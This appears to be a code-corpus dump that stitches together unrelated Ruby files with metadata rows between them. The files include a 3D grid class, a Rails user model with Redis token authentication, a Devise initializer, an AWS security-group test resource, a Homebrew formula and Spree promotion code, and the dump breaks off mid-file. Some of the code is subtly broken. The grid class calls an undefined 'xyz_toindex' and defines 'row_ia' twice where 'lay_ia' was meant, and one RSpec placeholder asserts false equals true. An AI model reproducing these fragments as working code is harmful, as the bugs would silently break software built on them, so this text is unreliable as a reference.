# ::default_cell_order
def self.default_cell_order
return @default_cell_order
end
##
# ::default_cell_order=(CELL_ORDER new_order)
def self.default_cell_order=(new_order)
validate_cell_order(new_order)
@default_cell_order = new_order
end
##
# ::cell_cube(int cols, int rows, int cell_w, int cell_h, int index)
# ::cell_cube(int cols, int rows, int cell_w, int cell_h, int x, int y, int z)
def self.cell_cube(cols, rows, lays, cell_w, cell_h, cell_d, *args)
index = args.size == 1 ? args.first : xyz_to_index(*args)
new(cols, rows, lays, cell_w, cell_h, cell_d).cell_cube(index)
end
##
# initialize(int cols, int rows, int lays, int cell_w, int cell_h, int cell_d)
def initialize(*args)
set(*args)
@cell_order = self.class.default_cell_order
end
##
# set(int cols, int rows, int lays, int cell_w, int cell_h, int cell_d)
def set(cols, rows, lays, cell_w, cell_h, cell_d)
@columns = cols.to_i
@rows = rows.to_i
@layers = lays.to_i
@cell_width = cell_w.to_i
@cell_height = cell_h.to_i
@cell_depth = cell_d.to_i
self
end
##
# cell_order=(CELL_ORDER new_order) -> nil
def cell_order=(new_order)
self.class.validate_cell_order(new_order)
@cell_order = new_order
end
##
# width -> int
def width
columns * cell_width
end
##
# height -> int
def height
rows * cell_height
end
##
# depth -> int
def depth
layers * cell_depth
end
##
# cell_count -> int
def cell_count
rows * columns * layers
end
##
# volume -> int
def volume
width * height * depth
end
##
# index_to_xyz(int x, int y, int z) -> int
def xyz_to_index(x, y, z)
case @cell_order
when CELL_ORDER_COLS then (x % columns) +
(y * columns) +
(z * columns * rows)
when CELL_ORDER_ROWS then (x * rows * layers) +
(y % rows) +
(z * rows)
when CELL_ORDER_LAYS then (x * layers) +
(y * layers * columns) +
(z % layers)
end
end
##
# index_to_xy(int index) -> Array<int>[3]
def index_to_xyz(index)
case @cell_order
when CELL_ORDER_COLS then [(index) % columns,
(index / columns) % rows,
(index / (columns * rows)) % layers]
when CELL_ORDER_ROWS then [(index / (rows * layers)) % columns,
(index) % rows,
(index / rows) % layers]
when CELL_ORDER_LAYS then [(index / layers) % columns,
((index / (layers * columns)) % rows),
(index) % layers]
end
end
##
# cell_a(int index) |
# cell_a(int x, int y, int z) |-> Array<int>[6]
def cell_a(*args)
case args.size
when 1 then x, y, z = index_to_xyz(args[0])
when 3 then x, y, z = *args
else raise(ArgumentError, "Expected 1 or 3 but recieved #{args.size}")
end
[cell_width * x, cell_height * y, cell_depth * z,
cell_width, cell_height, cell_depth]
end
##
# cell_cube(int index) |
# cell_cube(int x, int y, int z) |-> MACL::Cube
def cell_cube(*args)
MACL::Cube.new(*cell_a(*args))
end
##
# col_cube(x, z) -> Cube
# Returns an Cube of the column (x, z)
def col_cube(x, z)
Cube.new(x * cell_width, 0 * cell_height, z * cell_depth,
cell_width, cell_height * rows, cell_depth)
end
##
# row_cube(y, z) -> Cube
# Returns an Cube of the row (y, z)
def row_cube(y, z)
Cube.new(0 * cell_width, y * cell_height, z * cell_depth,
cell_width * columns, cell_height, cell_depth)
end
##
# lay_cube(x, y) -> Cube
# Returns an Cube of the row (x, y)
def lay_cube(x, y)
Cube.new(x * cell_width, y * cell_height, 0 * cell_depth,
cell_width, cell_height, cell_depth * layers)
end
##
# col_ia(int x, int z) -> Array<int>
# Returns an Array of indecies for colummn (x, z)
def col_ia(x, z)
(0...rows).map { |y| xyz_to_index(x, y, z) }
end
##
# row_ia(int y, int z) -> Array<int>
# Returns an Array of indecies for row (y, z)
def row_ia(y, z)
(0...columns).map { |x| xyz_toindex(x, y, z) }
end
##
# lay_ia(int x, int y) -> Array<int>
# Returns an Array of indecies for row (x, y)
def row_ia(x, y)
(0...layers).map { |z| xyz_toindex(x, y, z) }
end
end
end
MACL.register('macl/xpan/grid/grid3', '1.1.0') | 27.180952 | 83 | 0.544849 |
eda6670c31358d3cc660ae9100ca61fa0de24e37 | 175 | RSpec.describe Tippy do
it "has a version number" do
expect(Tippy::VERSION).not_to be nil
end
it "does something useful" do
expect(false).to eq(true)
end
end
| 17.5 | 40 | 0.691429 |
ff7f884c0892d69f8080b249c3a697b2d2497416 | 146 | # frozen_string_literal: true
RSpec.configure do |config|
config.mock_with :rspec do |mocks|
mocks.verify_partial_doubles = true
end
end
| 18.25 | 39 | 0.760274 |
4a38134473c6d2b0cd93a24b89c1696c5b91d3e0 | 1,337 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'vagrant-qienv/version'
Gem::Specification.new do |spec|
spec.name = "vagrant-qienv"
spec.version = VagrantPlugins::Cienv::VERSION
spec.authors = ["Alfredo Matas"]
spec.email = ["[email protected]"]
spec.summary = %q{Vagrant CI environment builder}
spec.description = %q{Vagrant CI environment builder}
spec.homepage = "http://github.com/amatas/vagrant-qienv.git"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org by setting 'allowed_push_host', or
# delete this section to allow pushing this gem to any host.
# if spec.respond_to?(:metadata)
# spec.metadata['allowed_push_host'] = "TODO: Set to 'http://mygemserver.com'"
# else
# raise "RubyGems 2.0 or newer is required to protect against public gem pushes."
# end
spec.files = `git ls-files`.split($\)
spec.executables = spec.files.grep(%r{^bin/}).map{ |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.11"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "method_source", "~> 0.8.2"
end
| 39.323529 | 85 | 0.673897 |
ac473d9ba655926e50f20f50239aabd18348ed09 | 74 | class <%= class_name %> < Less::Interaction
def run
end
private
end | 12.333333 | 43 | 0.662162 |
33fc1f76cd7e446aadcfd77aedef1fb8ef345b07 | 117 | require 'ecm/version'
module Ecm
module Files
module Backend
VERSION = ::Ecm::VERSION
end
end
end
| 11.7 | 30 | 0.649573 |
1acb9036a441a7d8e3f1e08597346dd1957a77a2 | 134 | class AddAdminToUsers < ActiveRecord::Migration[5.2]
def change
add_column :users, :admin, :boolean, :default => false
end
end
| 22.333333 | 57 | 0.723881 |
260c2386f743453515539a3e4bfb09d5e727eacb | 2,316 | class User < ActiveRecord::Base
# Include default devise modules. Others available are:
# :confirmable, :lockable, :timeoutable, :omniauthable, :registerable, :recoverable, :validatable
devise :database_authenticatable, :rememberable, :trackable
belongs_to :data_center
belongs_to :user_role
after_initialize :generate_sid_if_necessary
after_create :set_data_center_permission
validates :username, uniqueness: { message: I18n.t('activerecord.errors.models.user.attributes.username.uniqueness') }
validates :data_center, presence: { message: I18n.t('activerecord.errors.models.user.attributes.data_center.presence') }
validates :password, confirmation: { message: I18n.t('activerecord.errors.models.user.attributes.password.confirmation') }
validates :sid, presence: true
validates :sid, uniqueness: true
validates :sid, format: { with: /\AB[a-z0-9]{32}\z/ }
def api_sign_in
$redis.set(self.redis_key, {
auth_token: User.generate_random_hex_string,
expires_at: User.generate_token_expires_at
}.to_json)
end
def api_sign_out
$redis.del(self.redis_key)
end
def self.authenticate_from_token!(sid, auth_token)
api_key = User.fetch_api_key_from_redis(sid)
if api_key.present? && api_key.key?(:auth_token) && api_key.key?(:expires_at) && api_key[:auth_token] == auth_token && api_key[:expires_at] > Time.zone.now
return User.find_by(sid: sid)
end
return nil
end
def as_json(options = {})
Jbuilder.new do |user|
user.(self, :id, :data_center_id, :username, :locale, :sid, :user_role_id)
user.auth_token User.fetch_api_key_from_redis(sid).try(:[], :auth_token)
end.attributes!
end
protected
def redis_key
return "user_#{self.sid}"
end
private
def set_data_center_permission
DataCenterPermission.find_or_create_by(user: self, data_center: self.data_center)
end
def generate_sid_if_necessary
self.sid ||= "B#{User.generate_random_hex_string}"
return true
end
def self.fetch_api_key_from_redis(sid)
api_key = $redis.get("user_#{sid}")
return api_key.present? ? JSON.parse(api_key).try(:symbolize_keys) : nil
end
def self.generate_random_hex_string
return SecureRandom.hex(16)
end
def self.generate_token_expires_at
return 1.month.from_now
end
end
| 30.077922 | 159 | 0.736615 |
1d5b8b237756b14438c82fe2c50b1ceabaa07983 | 1,795 | # frozen_string_literal: true
require 'aws_backend'
class AwsSecurityGroups < AwsResourceBase
name 'aws_security_groups'
desc 'Verifies settings for AWS Security Groups in bulk'
example "
# Verify that you have security groups defined
describe aws_security_groups do
it { should exist }
end
# Verify you have more than the default security group
describe aws_security_groups do
its('entries.count') { should be > 1 }
end
"
attr_reader :table
# FilterTable setup
FilterTable.create
.register_column(:tags, field: :tags)
.register_column(:group_names, field: :group_name)
.register_column(:vpc_ids, field: :vpc_id)
.register_column(:group_ids, field: :group_id)
.install_filter_methods_on_resource(self, :table)
def initialize(opts = {})
# Call the parent class constructor
super(opts)
validate_parameters([])
@table = fetch_data
end
def fetch_data
security_group_rows = []
pagination_options = {}
loop do
catch_aws_errors do
@api_response = @aws.compute_client.describe_security_groups(pagination_options)
end
return [] if !@api_response || @api_response.empty?
@api_response.security_groups.map do |security_group|
security_group_rows += [{
group_id: security_group.group_id,
vpc_id: security_group.vpc_id,
group_name: security_group.group_name,
tags: map_tags(security_group.tags),
}]
end
break unless @api_response.next_token
pagination_options = { next_token: @api_response.next_token }
end
@table = security_group_rows
end
end
| 29.916667 | 88 | 0.641226 |
abfff5adfb558fbd296ae533a8514b163a0d7bf7 | 1,009 | require 'formula'
class Luabind < Formula
homepage 'http://www.rasterbar.com/products/luabind.html'
url 'http://downloads.sourceforge.net/project/luabind/luabind/0.9.1/luabind-0.9.1.tar.gz'
sha1 '2e92a18b8156d2e2948951d429cd3482e7347550'
depends_on 'lua'
depends_on 'boost'
depends_on 'boost-build' => :build
def patches
[
# patch Jamroot to perform lookup for shared objects with .dylib suffix
"https://raw.github.com/gist/3728987/052251fcdc23602770f6c543be9b3e12f0cac50a/Jamroot.diff",
# apply upstream commit to enable building with clang
"https://github.com/luabind/luabind/commit/3044a9053ac50977684a75c4af42b2bddb853fad.diff"
]
end
def install
args = [
"release",
"install"
]
if ENV.compiler == :clang
args << "--toolset=clang"
elsif ENV.compiler == :llvm
args << "--toolset=llvm"
elsif ENV.compiler == :gcc
args << "--toolset=darwin"
end
args << "--prefix=#{prefix}"
system "bjam", *args
end
end
| 27.27027 | 96 | 0.682854 |
bf304d79bf63a40f849d730ea17843406065c5fa | 876 | FactoryBot.define do
factory :document_hash, class: Hash do
sequence :title, 1 do |n|
"document_title_#{n}"
end
sequence :link, 1 do |n|
"path/to/document_#{n}"
end
content_id { SecureRandom.uuid }
sequence :description, 1 do |n|
"description_#{n}"
end
public_timestamp { Time.now }
release_timestamp { Time.now }
document_type { "answer" }
organisations {
[{
"acronym" => "DWP",
"content_id" => "b548a09f-8b35-4104-89f4-f1a40bf3136d",
"title" => "Department for Work and Pensions",
}]
}
content_purpose_supergroup { "guidance_and_regulation" }
is_historic { false }
government_name { "2015 Conservative government" }
es_score { nil }
format { "answer" }
facet_values { [] }
initialize_with { attributes.deep_stringify_keys }
end
end
| 26.545455 | 65 | 0.616438 |
ed77b970c768f6a5ab313a902176ba488e92015d | 1,068 | module Poser
class Comment
def self.positive(name=nil)
if name
["#{name.capitalize}! Let's hang out some time.", "#{name.capitalize} is my favorite person on this platform.", "#{name.capitalize} is doing an amazing job."].sample
else
["I couldn't agree more.", "This is why I downloaded this app.", "Hilarious!", "So good to hear!"].sample
end
end
def self.negative(name=nil)
if name
["#{name.capitalize}, Never hang out with me again.", "#{name.capitalize} is the worst person on this platform.", "#{name.capitalize} is doing a horrendous job."].sample
else
["I cannot disagree more.", "You don't look good in this post", "Yikes"].sample
end
end
def self.neutral(name=nil)
if name
["#{name.capitalize}, I could go either way, to be honest.", "#{name.capitalize} is just ok.", "#{name.capitalize} is doing an average job."].sample
else
["I guess.", "I'm really not certain.", "It doesn't really matter to me."].sample
end
end
end
end
| 35.6 | 177 | 0.621723 |
bf831027c886e092c9c91cfa303e94983e62fdb8 | 739 | module Spree
class File < Spree::Base
belongs_to :line_item
#has_attached_file :image, styles: { medium: "300x300>", thumb: "100x100>" }, default_url: "/images/:style/missing.png"
has_attached_file :image, styles: { thumb: "100x77" , medium: "500x385"}
#validates_attachment_content_type :image, content_type: /\Aimage\/.*\Z/
validates_attachment_content_type :image, content_type: %w(image/jpeg image/jpg image/tiff image/png application/pdf)
#validates_attachment :image, :content_type => {:content_type => %w(image/jpeg image/jpg image/tiff image/png application/pdf)}
before_post_process :skip_for_pdf
def skip_for_pdf
! %w(application/pdf).include?(image_content_type)
end
end
end | 41.055556 | 135 | 0.722598 |
e863d82e1b768a9571c16ee5e82794d299881e86 | 945 | cask "canon-ijscanner4" do
version "4.0.0a,19_2"
sha256 "abf852e335ee47947becd99eddece2159fa293225096b083578a174ec1f08778"
# gdlp01.c-wss.com/gds/ was verified as official when first introduced to the cask
url "https://gdlp01.c-wss.com/gds/1/0100006581/02/misd-mac-ijscanner4-#{version.before_comma.dots_to_underscores.delete_suffix("a")}-ea#{version.after_comma}.dmg"
name "Canon Scanner ICA Driver for CanoScan 9000F Mark II"
homepage "https://www.usa.canon.com/internet/portal/us/home/support/details/scanners/film-negative-scanner/canoscan-9000f-mark-ii?tab=drivers_downloads&subtab=downloads-drivers"
pkg "Canon IJScanner4_#{format("%<major>02d%<minor>02d%<patch>02d", major: version.major, minor: version.minor, patch: version.patch.to_i)}.pkg"
uninstall pkgutil: "jp.co.canon.pkg.canonijscanner4.#{format("%<major>02d%<minor>02d%<patch>02d", major: version.major, minor: version.minor, patch: version.patch.to_i)}"
end
| 67.5 | 179 | 0.77672 |
abf67189e2f0f31924c13b6c4aa1fa5ed9196dd6 | 5,477 | # frozen-string-literal: true
module Rodauth
Feature.define(:login_password_requirements_base, :LoginPasswordRequirementsBase) do
translatable_method :already_an_account_with_this_login_message, 'already an account with this login'
auth_value_method :login_confirm_param, 'login-confirm'
auth_value_method :login_email_regexp, /\A[^,;@ \r\n]+@[^,@; \r\n]+\.[^,@; \r\n]+\z/
auth_value_method :login_minimum_length, 3
auth_value_method :login_maximum_length, 255
translatable_method :login_not_valid_email_message, 'not a valid email address'
translatable_method :logins_do_not_match_message, 'logins do not match'
auth_value_method :password_confirm_param, 'password-confirm'
auth_value_method :password_minimum_length, 6
translatable_method :passwords_do_not_match_message, 'passwords do not match'
auth_value_method :require_email_address_logins?, true
auth_value_method :require_login_confirmation?, true
auth_value_method :require_password_confirmation?, true
translatable_method :same_as_existing_password_message, "invalid password, same as current password"
translatable_method :contains_null_byte_message, 'contains null byte'
auth_value_methods(
:login_confirm_label,
:login_does_not_meet_requirements_message,
:login_too_long_message,
:login_too_short_message,
:password_confirm_label,
:password_does_not_meet_requirements_message,
:password_hash_cost,
:password_too_short_message
)
auth_methods(
:login_meets_requirements?,
:login_valid_email?,
:password_hash,
:password_meets_requirements?,
:set_password
)
def login_confirm_label
"Confirm #{login_label}"
end
def password_confirm_label
"Confirm #{password_label}"
end
def login_meets_requirements?(login)
login_meets_length_requirements?(login) && \
login_meets_email_requirements?(login)
end
def password_meets_requirements?(password)
password_meets_length_requirements?(password) && \
password_does_not_contain_null_byte?(password)
end
def set_password(password)
hash = password_hash(password)
if account_password_hash_column
update_account(account_password_hash_column=>hash)
elsif password_hash_ds.update(password_hash_column=>hash) == 0
# This shouldn't raise a uniqueness error, as the update should only fail for a new user,
# and an existing user should always have a valid password hash row. If this does
# fail, retrying it will cause problems, it will override a concurrently running update
# with potentially a different password.
db[password_hash_table].insert(password_hash_id_column=>account_id, password_hash_column=>hash)
end
hash
end
private
attr_reader :login_requirement_message
attr_reader :password_requirement_message
def password_does_not_meet_requirements_message
"invalid password, does not meet requirements#{" (#{password_requirement_message})" if password_requirement_message}"
end
def password_too_short_message
"minimum #{password_minimum_length} characters"
end
def set_password_requirement_error_message(reason, message)
set_error_reason(reason)
@password_requirement_message = message
end
def login_does_not_meet_requirements_message
"invalid login#{", #{login_requirement_message}" if login_requirement_message}"
end
def login_too_long_message
"maximum #{login_maximum_length} characters"
end
def login_too_short_message
"minimum #{login_minimum_length} characters"
end
def set_login_requirement_error_message(reason, message)
set_error_reason(reason)
@login_requirement_message = message
end
def login_meets_length_requirements?(login)
if login_minimum_length > login.length
set_login_requirement_error_message(:login_too_short, login_too_short_message)
false
elsif login_maximum_length < login.length
set_login_requirement_error_message(:login_too_long, login_too_long_message)
false
else
true
end
end
def login_meets_email_requirements?(login)
return true unless require_email_address_logins?
return true if login_valid_email?(login)
set_login_requirement_error_message(:login_not_valid_email, login_not_valid_email_message)
return false
end
def login_valid_email?(login)
login =~ login_email_regexp
end
def password_meets_length_requirements?(password)
return true if password_minimum_length <= password.length
set_password_requirement_error_message(:password_too_short, password_too_short_message)
false
end
def password_does_not_contain_null_byte?(password)
return true unless password.include?("\0")
set_password_requirement_error_message(:password_contains_null_byte, contains_null_byte_message)
false
end
if ENV['RACK_ENV'] == 'test'
def password_hash_cost
BCrypt::Engine::MIN_COST
end
else
# :nocov:
def password_hash_cost
BCrypt::Engine::DEFAULT_COST
end
# :nocov:
end
def extract_password_hash_cost(hash)
hash[4, 2].to_i
end
def password_hash(password)
BCrypt::Password.create(password, :cost=>password_hash_cost)
end
end
end
| 33.601227 | 123 | 0.738908 |
bfc8a4a524f0af99bd5ee24226a69d31057ada81 | 309 | module Fog
module KeyManager
class TeleFonica
class Real
def delete_container(id)
request(
:expects => [204],
:method => 'DELETE',
:path => "containers/#{id}"
)
end
end
class Mock
end
end
end
end
| 16.263158 | 42 | 0.459547 |
bb5bd6a061f379d45697c086d0836099d2c196fa | 2,082 | module Spree
module PromotionHandler
# Decides which promotion should be activated given the current order context
#
# By activated it doesn't necessarily mean that the order will have a
# discount for every activated promotion. It means that the discount will be
# created and might eventually become eligible. The intention here is to
# reduce overhead. e.g. a promotion that requires item A to be eligible
# shouldn't be eligible unless item A is added to the order.
#
# It can be used as a wrapper for custom handlers as well. Different
# applications might have completely different requirements to make
# the promotions system accurate and performant. Here they can plug custom
# handler to activate promos as they wish once an item is added to cart
class Cart
attr_reader :line_item, :order
attr_accessor :error, :success
def initialize(order, line_item=nil)
@order, @line_item = order, line_item
end
def activate
promotions.each do |promotion|
if (line_item && promotion.eligible?(line_item, promotion_code: promotion_code(promotion))) || promotion.eligible?(order, promotion_code: promotion_code(promotion))
promotion.activate(line_item: line_item, order: order, promotion_code: promotion_code(promotion))
end
end
end
private
def promotions
connected_order_promotions | sale_promotions
end
def connected_order_promotions
Promotion.active.includes(:promotion_rules).
joins(:order_promotions).
where(spree_orders_promotions: { order_id: order.id }).readonly(false).to_a
end
def sale_promotions
Promotion.where(apply_automatically: true).active.includes(:promotion_rules)
end
def promotion_code(promotion)
order_promotion = Spree::OrderPromotion.where(order: order, promotion: promotion).first
order_promotion.present? ? order_promotion.promotion_code : nil
end
end
end
end
| 39.283019 | 174 | 0.695965 |
b9819bccffacc399cab91b4cab8cf283dcfadfd6 | 14,457 | # frozen_string_literal: true
# Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# The secret key used by Devise. Devise uses this key to generate
# random tokens. Changing this key will render invalid all existing
# confirmation, reset password and unlock tokens in the database.
# Devise will use the `secret_key_base` as its `secret_key`
# by default. You can change it below and use your own secret key.
# config.secret_key = '49fce65f7e6858acae2a31fc93daee2043e8a9cb65b2a533ecbba0e620a8e50527c869435883e2b865e8eecb5e50e9afae3915efa18a4349e55d2ecb5cf72b22'
# ==> Controller configuration
# Configure the parent class to the devise controllers.
# config.parent_controller = 'DeviseController'
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class
# with default "from" parameter.
config.mailer_sender = '[email protected]'
# Configure the class responsible to send e-mails.
# config.mailer = 'Devise::Mailer'
# Configure the parent class responsible to send e-mails.
# config.parent_mailer = 'ActionMailer::Base'
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [:email]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [:email]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [:email]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:database]` will
# enable it only for database authentication. The supported strategies are:
# :database = Support basic authentication with authentication key + password
# config.http_authenticatable = false
# If 401 status code should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. 'Application' by default.
# config.http_authentication_realm = 'Application'
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# particular strategies by setting this option.
# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing skip: :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# By default, Devise cleans up the CSRF token on authentication to
# avoid CSRF token fixation attacks. This means that, when using AJAX
# requests for sign in and sign up, you need to get a new CSRF token
# from the server. You can disable this option at your own risk.
# config.clean_up_csrf_token_on_authentication = true
# When false, Devise will not attempt to reload routes on eager load.
# This can reduce the time taken to boot the app but if your application
# requires the Devise mappings to be loaded during boot time the application
# won't boot properly.
# config.reload_routes = true
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 11. If
# using other algorithms, it sets how many times you want the password to be hashed.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments. Note that, for bcrypt (the default
# algorithm), the cost increases exponentially with the number of stretches (e.g.
# a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation).
config.stretches = Rails.env.test? ? 1 : 11
# Set up a pepper to generate the hashed password.
# config.pepper = '6b4522f20ab27a7e8d1713a5eb61aa4277101dba0e8ba7c8c0a9093066e1aa840c7b1266e36003837c459de7084d47f6285e8f605b09efd5ba3b326067063766'
# Send a notification to the original email when the user's email is changed.
# config.send_email_changed_notification = false
# Send a notification email when the user's password is changed.
# config.send_password_change_notification = false
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming their account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming their account,
# access will be blocked just in the third day.
# You can also set it to nil, which will allow the user to access the website
# without confirming their account.
# Default is 0.days, meaning the user cannot access the website without
# confirming their account.
# config.allow_unconfirmed_access_for = 2.days
# A period that the user is allowed to confirm their account before their
# token becomes invalid. For example, if set to 3.days, the user can confirm
# their account within 3 days after the mail was sent, but on the fourth day
# their account can't be confirmed with the token any more.
# Default is nil, meaning there is no restriction on how long a user can take
# before confirming their account.
# config.confirm_within = 3.days
# If true, requires any email changes to be confirmed (exactly the same way as
# initial account confirmation) to be applied. Requires additional unconfirmed_email
# db field (see migrations). Until confirmed, new email is stored in
# unconfirmed_email column, and copied to email column on successful confirmation.
config.reconfirmable = true
# Defines which key will be used when confirming an account
# config.confirmation_keys = [:email]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# Invalidates all the remember me tokens when the user signs out.
config.expire_all_remember_me_on_sign_out = true
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# secure: true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length.
config.password_length = 6..128
# Email regex used to validate email formats. It simply asserts that
# one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
config.email_regexp = /\A[^@\s]+@[^@\s]+\z/
# ==> Configuration for :timeoutable
# The time you want to timeout the user session without activity. After this
# time the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [:email]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# Warn on the last attempt before the account is locked.
# config.last_attempt_warning = true
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [:email]
# Time interval you can reset your password with a reset password key.
# Don't put a too small interval or your users won't have the time to
# change their passwords.
config.reset_password_within = 6.hours
# When set to false, does not sign a user in automatically after their password is
# reset. Defaults to true, so a user is signed in automatically after a reset.
# config.sign_in_after_reset_password = true
# ==> Configuration for :encryptable
# Allow you to use another hashing or encryption algorithm besides bcrypt (default).
# You can use :sha1, :sha512 or algorithms from others authentication tools as
# :clearance_sha1, :authlogic_sha512 (then you should set stretches above to 20
# for default behavior) and :restful_authentication_sha1 (then you should set
# stretches to 10, and copy REST_AUTH_SITE_KEY to pepper).
#
# Require the `devise-encryptable` gem when using anything other than bcrypt
# config.encryptor = :sha512
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
# config.sign_out_all_scopes = true
# ==> Navigation configuration
# Lists the formats that should be treated as navigational. Formats like
# :html, should redirect to the sign in page when the user does not have
# access, but formats like :xml or :json, should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ['*/*', :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo'
# ==> Warden configuration
# If you want to use other strategies, that are not supported by Devise, or
# change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(scope: :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
# When using Devise inside an engine, let's call it `MyEngine`, and this engine
# is mountable, there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: '/my_engine'
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
# When using OmniAuth, Devise cannot automatically set OmniAuth path,
# so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = '/my_engine/users/auth'
# ==> Turbolinks configuration
# If your app is using Turbolinks, Turbolinks::Controller needs to be included to make redirection work correctly:
#
# ActiveSupport.on_load(:devise_failure_app) do
# include Turbolinks::Controller
# end
# ==> Configuration for :registerable
# When set to false, does not sign a user in automatically after their password is
# changed. Defaults to true, so a user is signed in automatically after changing a password.
# config.sign_in_after_change_password = true
end
| 48.19 | 154 | 0.751262 |
33b165b2f8140b9686f84bca80f073205f24dc14 | 1,796 | require 'test_helper'
class UserTest < ActiveSupport::TestCase
# test "the truth" do
# assert true
# end
def setup
@user=User.new(name:"Teresia Muiruri" ,email: "[email protected]",password: "foobar", password_confirmation: "foobar")
end
test "should be valid" do
assert @user.valid?
end
test "name should be present" do
@user.name = " "
assert_not @user.valid?
end
test "name should not be too long" do
@user.name = "a" * 51
assert_not @user.valid?
end
test "email should not be too long" do
@user.email = "a" * 244 + "@example.com"
assert_not @user.valid?
end
test "email validation should accept valid addresses" do
valid_addresses = %w[[email protected] [email protected] [email protected]
[email protected] [email protected]]
valid_addresses.each do |valid_address|
@user.email = valid_address
assert @user.valid?, "#{valid_address.inspect} should be valid"
end
end
test "email validation should reject invalid addresses" do
invalid_addresses = %w[user@example,com user_at_foo.org user.name@example.
foo@bar_baz.com foo@bar+baz.com]
invalid_addresses.each do |invalid_address|
@user.email = invalid_address
assert_not @user.valid?, "#{invalid_address.inspect} should be invalid"
end
end
test "email addresses should be unique" do
duplicate_user = @user.dup
@user.save
assert_not duplicate_user.valid?
end
test "password should be present (nonblank)" do
@user.password = @user.password_confirmation = " " * 6
assert_not @user.valid?
end
test "password should have a minimum length" do
@user.password = @user.password_confirmation = "a" * 5
assert_not @user.valid?
end
end
| 30.440678 | 124 | 0.668708 |
1cb085049080d0ff2f1e7849c95457f2dd6b9b58 | 1,251 | require 'commands'
# Holds positional arrays in relation to cardinal directions
module Direction
NORTH = [0, -1]
